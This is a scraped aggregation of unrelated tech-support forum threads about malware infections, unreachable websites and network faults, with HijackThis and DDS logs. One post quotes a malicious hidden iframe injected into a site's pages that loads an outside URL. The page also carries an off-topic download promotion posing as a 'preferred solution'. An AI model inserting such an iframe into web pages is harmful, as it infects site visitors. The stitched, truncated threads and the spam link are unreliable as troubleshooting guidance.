Over 1 million tech questions and answers.

HEU_AEGIS, computer keeps trying to reach a suspicious site

Q: HEU_AEGIS, computer keeps trying to reach a suspicious site

Hi guys!!  Boy, I hope you can help me because I am about to pull my hair out over this one.
I think I got infected with some virus called HEU_AEGIS_HttpDownloader blah blah a month back.  I think this because it came up in my AV (Trend Micro Titanium Maximum Security).  The AV did its thing and I guess cleaned the virus or removed it.  It no longer shows up.  During this time, I also received about a dozen of other warnings about a suspicious file which Trend deleted whenever it showed up.  It was always found at: C:\Documents and Settings\Owner\Local Settings\Temp\***.tmp.exe (the *** would always be some random letters and numbers).  This virus and ***.tmp.exe file no longer shows up.  However...
Since that virus popped up (and these two things may not be related) I keep getting a web threat listed in Trend Micro which shows a web threat which happens about twice every hour.  It says it 'blocked' a web threat to website address 176.9.##.###/ip.php
I have checked my services, msconfig start up settings, registry, and even a complete search on my hard drive for that IP (which I partially masked on purpose).  Nothing can find it.
I tried running full scans of Trend Micro Titanium Maximum Security, Ad Aware, MalwareBytes, and Super AntiMalware.  All of them say my machine is clean.
I even tried using my earliest system restore point, and that did not rid me of these constant web threats.
There has to be something automated and running on my machine that tries to hit that website every thirty minutes, but how can I tell what it is - and how to put an end to it???
Here is a copy of my hijack this log.  For all that is good and holy, and for my last ounce of sanity, please, please help me.
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 9:07:13 PM, on 6/24/2014
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal
Running processes:
C:\Program Files\Creative\Shared Files\CTAudSvc.exe
C:\Program Files\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Trend Micro\UniClient\UiFrmWrk\uiWatchDog.exe
C:\Program Files\Trend Micro\AMSP\coreFrameworkHost.exe
C:\Program Files\Trend Micro\UniClient\UiFrmWrk\uiSeAgnt.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\Program Files\LeapFrog\LeapFrog Connect\CommandService.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files\Trend Micro\HiJackThis\HiJackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896" target="_blank" class="wLink">http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R3 - URLSearchHook: (no name) - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - (no file)
O2 - BHO: Trend Micro NSC BHO - {1CA1377B-DC1D-4A52-9585-6E06050FAC53} - C:\Program Files\Trend Micro\AMSP\module\20004\3.0.1313\6.8.1120\TmIEPlg.dll
O2 - BHO: Trend Micro Toolbar BHO - {43C6D902-A1C5-45c9-91F6-FD9E90337E18} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll
O2 - BHO: Java™ Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O2 - BHO: TmBpIeBHO - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files\Trend Micro\AMSP\module\20002\8.0.1170\8.0.1170\TmBpIe32.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O3 - Toolbar: Trend Micro Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll
O4 - HKLM\..\Run: [CTxfiHlp] CTXFIHLP.EXE
O4 - HKLM\..\Run: [EPSON Stylus C88 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIABA.EXE /P23 "EPSON Stylus C88 Series" /O6 "USB001" /M "Stylus C88"
O4 - HKLM\..\Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
O4 - HKLM\..\Run: [CanonSolutionMenuEx] C:\Program Files\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
O4 - HKLM\..\Run: [IJNetworkScannerSelectorEX] C:\Program Files\Canon\IJ Network Scanner Selector EX\CNMNSST.exe /FORCE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RunDLL32.exe NvMCTray.dll,NvTaskbarInit -login
O4 - HKLM\..\Run: [nwiz] C:\Program Files\NVIDIA Corporation\nview\nwiz.exe /installquiet
O4 - HKLM\..\Run: [Trend Micro BTC] "C:\Program Files\Trend Micro\Titanium\plugin\TMDC\TMDC.exe" -btc
O4 - HKLM\..\Run: [Trend Micro Client Framework] "C:\Program Files\Trend Micro\UniClient\UiFrmWrk\UIWatchDog.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [OE] C:\Program Files\Trend Micro\Internet Security\TMAS_OE\TMAS_OEMon.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [OE] C:\Program Files\Trend Micro\Internet Security\TMAS_OE\TMAS_OEMon.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: Garmin Communicator Plug-In - https://static.garmincdn.com/gcp/ie/
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1341604563412
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O18 - Protocol: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\8.0.1170\8.0.1170\TmBpIe32.dll
O18 - Protocol: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\module\20004\3.0.1313\6.8.1120\TmIEPlg.dll
O18 - Protocol: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll
O18 - Protocol: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\UIFramework\ProToolbarIMRatingActiveX.dll
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: SAS Core Service (!SASCORE) - SUPERAntiSpyware.com - C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
O23 - Service: Trend Micro Solution Platform (Amsp) - Trend Micro Inc. - C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Creative Audio Engine Licensing Service - Creative Labs - C:\Program Files\Common Files\Creative Labs Shared\Service\CTAELicensing.exe
O23 - Service: Creative Audio Service (CTAudSvcService) - Creative Technology Ltd - C:\Program Files\Creative\Shared Files\CTAudSvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Oracle Corporation - C:\Program Files\Java\jre7\bin\jqs.exe
O23 - Service: Ad-Aware Service 11 (LavasoftAdAwareService11) - Unknown owner - C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe
O23 - Service: LeapFrog Connect Device Service - LeapFrog Enterprises, Inc. - C:\Program Files\LeapFrog\LeapFrog Connect\CommandService.exe
O23 - Service: NVIDIA Network Service (NvNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Security Activity Dashboard Service - Unknown owner - C:\Program Files\Trend Micro\TrendSecure\SecurityActivityDashboard\tmarsvc.exe (file missing)
End of file - 8494 bytes

Preferred Solution: HEU_AEGIS, computer keeps trying to reach a suspicious site

I recommend downloading and running DAP. It can help sort out any driver and firmware related issues on your system

It's worked out well for many of us in the past.

You can download it direct from this link http://downloaddap.org. (This link will open the download page of DAP so you can save a copy to your computer.)

A: HEU_AEGIS, computer keeps trying to reach a suspicious site

I believe I found the cause of this issue.  A rootkit was hiding itself pretty well.  Malwarebytes, SuperAntiSpyware, Trend Micro Titanium, and Ad Aware could not find it.  I finally tried Kaspersky's TDSSKiller and it found and deleted an .exe file and registry entry it said was a high risk.  Since it removed the file, I have had no web threats in the past 24 hours.
Here is the text of the infected file TDSSKiller reported and removed:
File: C:\Document and Settings\Owner\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\winhlp32.exe
Malware object, high risk
If anyone else is experiencing a constant barage of web threats being blocked and can't find the cause; be sure to try TDSSKiller.

Read other 3 answers

hello everyone
i hope you are well
i can find the problem in my site with help dear cchamberland
that is  an iframe injection at the bottom of my pages, in index.php, footer.php,etc
then i removed the iframe,And also i was applied some other security  to the site.
< iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://highperformancetraining.org/chhd.html?i=1526587 >< /iframe >
but now after 1 day My site was infected again the same iframe.
I really do not know what should i do?
Is there anyone who can help me?
my site is   www.pasak.org
Pasak Sh

A:problem in my site , google alarm that my site is Suspicious

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

Read other 2 answers

This is bizarre.

I'm trying to persuade my browser to connect with www.piratour.net. It times out and fails to find it.

I try on my phone using the home wi-fi - same result.

I switch off my phone wi-fi and try with data. Success!

This happens on the PC with both Firefox and Edge.

I open a command window and try ping www.piratour.net. Nothing, however the screen tells me immediately that the ip address is .

I have spent quality time with my ISP (Plusnet in the UK). The man tried that address from his own machine - no success.

I have tried changing the DNS servers (my idea). No luck.

The fact that the service guy also couldn't reach it suggests that the problem is somewhere way outside my setup.

I would appreciate any thoughts.

Tech Support Guy System Info Utility version
OS Version: Microsoft Windows 10 Home, 64 bit
Processor: Intel(R) Celeron(R) CPU J3060 @ 1.60GHz, Intel64 Family 6 Model 76 Stepping 4
Processor Count: 2
RAM: 3941 Mb
Graphics Card: Intel(R) HD Graphics, 1024 Mb
Hard Drives: C: 149 GB (85 GB Free); D: 780 GB (663 GB Free);
Antivirus: Windows Defender, Enabled and Updated

Read other answers

For some reason, I am unable to reach Ann Coulter - Official Home Page on my computer. It's been several weeks since I was last able to visit the site. The problem happens in every browser I have, including recent or current versions of Firefox, IE, Opera and Chrome. I can reach any other website I try to get to just fine. I never used to have any trouble reaching that website until about a month ago. No one else uses this computer and I live alone.

It appears that I've blocked that one site but I'm darned if I can figure out how.

Here's what I've tried so far:
1. Run Avast Free Antivirus with the latest version of the program and definitions. Results: no threats found with either the quick scan or the full scan.
2 Run Malware Bytes with the latest definitions. Results: Results: two threats found and removed but I still can't reach the Coulter website.
3. Checked my Hosts file. Results: nothing there is blocking any website.
4. Checked my router settings. Can't see any blocks there.
5. Had other people try to access the site; they were successful.
6. Googled and found one other forum where someone was having the same problem with respect to the Coulter website. But his problem apparently went away two weeks ago. He didn't indicate if he had done anything to make it go away.
7. Checked the Windows Event logs but can't see anything there reflecting my problem.

Can anyone suggest anything else I can check?

I can live without this website working but it's bugging me tha... Read more

A:Can't reach one site

Since it's happening in all browsers, my guess is it's blocked in your modem/router. Any liberals been around? lol

Read other 15 answers

I'm trying to reach a friend's FTP site and can't get any connection/response.

Direct FTP attempt: The operation "times out".
Pinging his IP address from CMD prompt: All attempts time out.
Tracert to his IP: It begins the trace process, but loses the route after about 4 hops.

I have placed his IP address in the excluded (allowed) sites in my firewall settings. I can't figure out what else may be preventing my connection. Any help?

Dave Danger

XP Pro SP2, Asus A7N8X-X MoBo, AMD Athlon XP at 1837.5 MHz.
512 MB DDR-SDRam.
Symantec Internet Security, AVG Free 7.0.308, SpySubtract/Adsubtract, NoAdware, Ad-Aware SE Personal

A:Solved: Can't reach an FTP site

Read other 7 answers

I bought My Elite X2 on 24th Dec 2016.  I checked my warranty thru ' http://h20566.www2.hp.com/hpsc/wc/public/home '  Since the warranty is not correct, so I have attemped to dispute the warranty thru ' http://support.hp.com/us-en/checkwarranty?openCLC=true ' But I could not checked my warranty thru this site.  I wonder how I open dispute warranty? 

Read other answers

I have a Win XP SP3 desktop PC that developed a problem reaching search engine sites.
I have cleared out viruses and malware using various apps including MWB and other security software.
Had a problem with Bing but seems to be clear now, but still won't reach any www.google sites. Does reach google sites with prefix, such as maps.google, etc. but none of the www.google sites.
In accordance with your instructions I have run diagnostics and attach logs dds.txt and attach.zip
Also attached report from minitoolbox.
I hope you may have an answer up your sleeve.
Many thanks for any assistance.
Kind regards

A:Cannot reach any www.google site

Hello qpager I would like to welcome you to the Malware Removal section of the forum.Around here they call me Gringo and I will be glad to help you with your malware problems.Very Important --> Please read this post completely, I have spent my time to put together somethings for you to keep in mind while I am helping you to make things go easier, faster and smoother for both of us!Please do not run any tools unless instructed to do so.We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.Please do not attach logs or use code boxes, just copy and paste the text.Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.Please read every post completely before doing anything.Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.Please provide feedback about your experience as we go.A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", ... Read more

Read other 22 answers

To use some features on the Nascar.com web site, you need to log in through https://secure.audience.nascar.com. Problem is, the site can't be reached or pinged. Increasing ping time generates nothing but timeout errors. Something in the computer is blocking it from reaching that web address, whether it's entered as a name or a numeric address. This problem happens with four different web browsers - IE8, Firefox 3, Chrome and Safari.

It's a Gateway laptop with Vista SP1. It happens with a LAN connection. WiFi and Ev-Do. The web address is available on one machine with an identical WiFi link but not with the Gateway laptop.

Here are some of the attempts to solve the problem that have failed:

Resetting TCP/IP stack.
Switching DNS server.
Removing Norton Internet Security 2008.
Shutting down Windows Defender.
Running the computer with no firewall.
Removing and reinstalling network adapters and reinstalling drivers.
Running Vista in safe mode with networking.
Removing all temporary files and history.
Adding the domain to the IE trusted sites list.

The secure.audience.nascar.com address and the nascar.com domain are not blocked in the Hosts list.

NASCAR tech support has no idea what's going on.
Several checks of other web sites and Microsoft's online support on problems with accessing https secure sites have turned up no problems with accessing that site.

The Gateway has no trouble accessing several other https secure sites, but can not reach secure.a... Read more

A:Can't reach a https secure site

Read other 7 answers

Using three different computers 1 Win 7, 2 Win 10 and one android phone.
On the Windows 7 machine I cannot reach one web site (SanduskyRotaryPizzaChallenge.com), I get 503 server unavailable. All other web sites work fine on the Win 7 machine. Using Chrome, IE and Edge.
On the Win 10 and Android the web site works fine.
Only the one web site on only the one computer does it not work.
I can using FileZilla I can FTP into the site, on ALL computers.
So what should I be looking at on the Win 7 machine? Remember all other sites work fine.

Read other answers

I am using a NetGear RP614 v1 router to share a cable network connection to the Internet. We need to connect to the web site of out local school system, (ip = We cannot see any pages from this domain if the router is connected, however everything is OK if we connect any of our computers to the cable modem. The router is not set up to block any sites. I have reduced the maximum packet size from 1500 to 1400 to 1300 bytes, but no change in connectivity has happened. Any ideas wher to look?
The DNS servers listed by the router are correct, and I still cannot connect if I enter the IP address rather than the URL.

There are computers on the lan running Win 95, Win98, WinXP and all see the same thing. We are using a Motorola SurfBoard SB5100.

A:Can't reach a known good web site when using router.

You can not access your own IP, if that is the IP-number in your router.
Just use http://www.forsyth.k12.ga.us/ and all should be fine.

Read other 7 answers

It happens on all browsers on every computer in the house. I am running NIS 2012
and can't find if/where that is causing the problem. It maybe my ISP but how would I know? Any advice is welcome. Thank you.

A:Can't reach Newegg consistently and I know their site is up

Newegg.com is working for me now but their are times it doesn't. A couple weeks ago I couldn't get to them.

Read other 5 answers

Hi, I have known a problem lately about some malware that won't let you get to any of microsoft's sites or antimalware sites - by scaning my computer found some 01.tmp, 02.tmp files - the files are being deleted by malwarebytes at startup but spawn alive againg every time.I was looking for help at this forum - found some topics about the issue, but could'nt find any answer.so I went to war alone, and won... (after too many hours - about 6)anyway, I'm new around here and probably won't last long, so this is kind of an advice for whomever has this malware problem or for the administrators of the forum trying to help other's:the little $!#!#! is poisening the dns cache - that's why you can't get to any site even you're editing your hosts file.so what you shoud do is:1. open CMD.EXE,2. type in the command line: TASKLIST /SVC - this will list all proccesses currently runing with the services in the background.3. look for a proccess "svchost.exe" with the service "Dnscache"4. open task manager, and if you still don't have the "PID" column, go to "VIEW", "SELECT COLUMNS" and add it5. kill the svchost proccess that is runing the dns cache by comapring the PID's from the CMD to those in the taskmanager.6. now you can access site freely: the microsoft malicous remove tool will find it for you and also COMODO free antivirus.7. NOTICE that until the malware is wiped out you should do steps 1-5 every time your computer is ... Read more

A:Can't reach microsoft'w site and antimalware sites - 01.tmp file

You can simply stop and restart the DNS Service using these commands :NET STOP DNSCache
NET START DNSCacheYou can save these lines in a file with extension .CMD and when you need to run it, just double click on the file.

Read other 1 answers

I keep getting pops from MalwareBytes that they have blocked a malicious site. The weird thing is - it's OUTBOUND!! I have no idea why this is happening or how to stop it. The pop up window says the site is "stats.traffiliate.com" - IP - and a port number that keeps changing. Today the first port was 61276, then it was 61681, then 61866 - then I stopped recording the port. It also shows what program is trying to do this, but I can't get the whole path - this is all I can see:

C:/Program Files (X86)/Goo....ome/Application/Chrome.exe

So I'm sure it's something with Chrome, but how do I stop it. I'm happy it's blocking malicious stuff, but this is starting to drive me crazy. I've never had anything like this before. It's only been happening the last 10-12 days. I've run all the clean up programs I can have including, Ccleaner, Disk Cleanup, TFC, and defragged, but nothing has stopped it.

I think there have been times when it showed other sites it was blocking, but this one is the most consistent and I figure if I can learn how to stop it, I can get rid of any others that might pop up.

As always - thanks for all your help.

Read other answers

Running a MAC OS X using Parallels to run Vista. So in Vista I am using WordPress to do a web site hosted by Dreamhost when I discovered that when I went to my domain using Mozilla I get redirected to a suspicious site "targetedinfo.com" I changed my FTP password for word press and even deleted the domain from dreamhost to insure that wordpress was removed from my site which I suspected was the problem. I used Mozilla to install WordPress. I went to my site host and put up web site under construction which is what is seen from any computer except mine.

When I visit my domain from the infected computer using Mozilla I get redirected, when I use IE I do not get redirected. To make matters worse when I use Mozilla or Safari from the MAC OS X I get redirected.

Need help!

Read other answers

Logfile of HijackThis v1.99.1
Scan saved at 9:57:15 PM, on 28/06/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Mozilla Firefox\firefox.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.03.0000.1005\en-xu\stmain.dll
O2 - BHO: MSNToolBandBHO - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\MSN Toolbar\01.02.5000.1021\en-ca\msntb.dll
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: EPSON Web-To-Page - {EE5D27... Read more

A:i entered suspicious site is my hjt log clean?

Read other 6 answers

I was on facebook and was scrolling through my news feed when I saw something saying ""I can't believe a girl did this because of Justin Beiber" with the URL. Being that I disliked the guy anyway, I was curious and bored.

(click at your own risk since I do not know if it is malicious or not, but i do not recognize the domain link .info): justinbgirl.info

there was another URL when i entered it in the search field on Facebook: crazyjustin.info as part of a second post relating to it.

When I stupidly clicked on the link of the first one, it took me to a page (i took a screenshot in the attached file). I couldn't navigate anywhere and seemed like nothing happened. No antivirus alerts, nothing out of the ordinary. My laptop did not act up or anything either. I checked my task manager for suspicious programs but nothing registered as anything malicious.

I scanned my laptop and my scanner found nothing.

Now I am worried I am infected with spyware and I have no clue where to turn to or what to do to check to see if I even have it in the first place.

A:Suspicious Site on Facebook...possible spyware/malware?

Stupidity is a very expensive luxury. Anyways, scan like theres no tomorrow. Use MBAM, SAS and the resident AV.

Dont access critical sites like your bank and cc, until you are certain the computer's clean. Watch out for wierd behavior. Go to task manager and check for any suspicious names, google for them.

If you're paranoid or lazy, just restore windows from a previously created image, if theres one.

Some people would advise a reinstall, but that should only be the last resort.

Read other 9 answers


Today i went to log into hotmail and the site was blocked by webroot saying suspicious site - i logged in because i know this site. The site blocked shows : http://by161w.bay161.mail.live.com/mail/logout.aspx or http://by161w.bay161.mail.live.com/?rru=home&livecom=1 - when i tried to logout. Once open, the face page looks normal but when i click on a message or options (to change password) the page goes blank and the address prefills with http://baymsg1020229.by2.gateway.edge.messenger.live ... or http://geo.messenger.services.live.com/xmlProxy.htm?vn=9.0905150&domain+live.com - something else suspicious is when i try to logout it appears I do - but when i click to normal log in site again - it automatically logs in (face page) without my having to enter my login/password - so i assume i cannot log out either! A few weeks back I would get the "suspicious site" msg fm webroot on the ads WITHIN hotmail and that resolved .. but this is entirely diff - i cannot do anything once i get into my site and i cannot log out properly - i am on windows xp 2002 live pack 3 - 64 bits - have webroot internet security complete and the last scan was done earlier today with only cookies detected. Am I hacked and what to do? Any help appreciated

Read other answers

In last couple day, comp start try 2 reach out from my comp out to random IPs (block by peerblock), go thru 1000s of ports from 1 internal IP. Only new thing install is bluestack android emulater. Also new 11-14 msft updates: "nov security monthly rollback..." and "win malicious sfot remove tool -
nov '17". I uninstall bluestack but ip attempt still continue.

Run scans: Norton AV, super antispyware, MBAM and spybot sd - all come bak clean, no infect no rootkit, etc. Unfortunately no hav restore pt (sys restore somhow turn off at some pt in past w/o my know?) to go back to.

Try 2 connect 2 follwing IPs thousands time/minute (but only when internet adapter turn on. when i turn off, attempt stop, duno if important or obvious)


"ei du pont de nemours and co, inc"

"merit compuyter network"

I do no know if some soft is attempt 2 update, or if infection, or what. Try 2 google info about IPs but only find generic amazon info, no hint what this could be

DDS contents as reqwuest:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18838 BrowserJavaVersion: 11.151.2
Run by at 4:00:54 on 2017-11-16
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.1.1033.18.12279.7112 [GMT -8:00]
AV: Norton Security Suite *Disabled/Updated* {30744133-1E94-7B35-F4A3-82A5AEF1CBAA}
AV: Malwarebytes *Enabled/Updated* {23007AD3-69FE-687C-... Read more

A:Computer keeps trying to reach several IPs

BUMP, please

Read other 6 answers

I made LAN of my PC and laptop using 1 additional Network adapter in my PC and connecting them both with CAT5 Cross-over cable. I manually stated IP's in Network TCP/IP connection configuration, respectively for my PC and for my laptop.
Problem begins here - i can ping from PC to laptop and receive response, connect to it and see shared folders/printers. But when i try to ping from laptop to PC, all i get is - Request timed out. Any other connections is impossible from laptop to PC impossible also. Although in Connection Status window, i can see how my PC receive pinging's packets. Both computers firewalls are off.

P.S. - cant explain this but - when i change ends of cable between computers, my laptops "ping -t" for PC, gets responded 4 times and continues getting timing out after.

A:One computer can't reach other in LAN

when i change ends of cable between computers, my laptops "ping -t" for PC, gets responded 4 times and continues getting timing out after.Click to expand...

I applaud your trouble shooting. Most people never think of switching the cable like that.

The result makes the cable a top suspect.

Read other 3 answers

In last couple day, comp start try 2 reach out from my comp out to random IPs (block by peerblock), go thru 1000s of ports from 1 internal IP. Only new thing install is bluestack android emulater. Also new 11-14 msft updates: "nov security monthly rollback..." and "win malicious sfot remove tool -
nov '17". I uninstall bluestack but ip attempt still continue.

Run scans: Norton AV, super antispyware, MBAM and spybot sd - all come bak clean, no infect no rootkit, etc. Unfortunately no hav restore pt (sys restore somhow turn off at some pt in past w/o my know?) to go back to.

Try 2 connect 2 follwing IPs thousands time/minute (but only when internet adapter turn on. when i turn off, attempt stop, duno if important or obvious)


"ei du pont de nemours and co, inc"

"merit compuyter network"

I do no know if some soft is attempt 2 update, or if infection, or what. Try 2 google info about IPs but only find generic amazon info, no hint what this could be

DDS contents as reqwuest:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18838 BrowserJavaVersion: 11.151.2
Run by at 4:00:54 on 2017-11-16
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.1.1033.18.12279.7112 [GMT -8:00]
AV: Norton Security Suite *Disabled/Updated* {30744133-1E94-7B35-F4A3-82A5AEF1CBAA}
AV: Malwarebytes *Enabled/Updated* {23007AD3-69FE-687C-... Read more

Read other answers

Following complete failure of my touchscreen, the machine was taken away for repair just before the warranty expired, the touchscreen was replaced, but arrived back with damage inside the screen. Despite my efforts, I've not been able to get back in touch with anyone from HP. When I attempt to contact via website, after identifying my product it comes up with "page cannot be displayed" - I sent an email on December 17th and received no reply, a follow up email today came back undelivered due to the mailbox exceeding quota. I'm pulling my hair out!     HP Pavilion All-in-One - 23-q105na (Touch)Model #: P1K69EASerial #: CZC5467J1K

Read other answers

As i said on the topic.

While i use my external hdd, my computer freezed and i restart it.

After windows started, i plug hdd again i couldn't see my hdd on 'my computer'.

But i can (not cant) see it My Computer(Right click)>Manage>Disk Management and Control Panel>System>Device Manager>Storage Drivers(i dont know exact word for it, coz i use Turkish Win)

And i can't do anything from these tool. I cant give driver letter, i cant recover or see with recovery programs, i cant and i cant

And i know it nothing to do with OS, and i need all things in this hdd.

Device : WD 3200BEV External USB Drive

And thats my problem, please help me out.

A:Cant reach my external HDD, but can see it from Computer Management and System

Describe the external drive and enclosure.

Read other 5 answers

Parts List:
AMD CPU FX series
ASUS AMD Motherboard
1 SSD for Booting
2 Hard Disks for storage
GTX 970
750 W Power Supply

My problem is that I hit the power button on my computer it turns on but with fans at 20% and doesn't show anything on the screen, not even bios. I have already replaced the power supply and the motherboard thinking they were killed by a power surge but no luck. I wanted to consult people more knowledgeable than myself before I spend anymore money. Any advice would be great!

I have replaced the motherboard and power supply and tried changing ram and removing ram altogether. I also switched around my hard drives and ssd to try to get to BIOS.

Read other answers

Ok so here's what's going on one of my computers (windows xp home professional I believe) I downloaded a pretty nasty virus by mistake and ran it (for some reason avg didnt detect it as a virus) well this virus may just of totaled my hard drive beyond repair I've researched on the web for people who have had it happen to them but found no easy answer. What happens is this:

1. I boot up computer
2. Computer gets all the way to loading bar
3. Quick Blue screen appears
4. BAM computer reboots endless cycle

Now I've made myself a winxp recovery cd (never had one in the first place) and have tried various commands to bring my computer to a working state to no avail

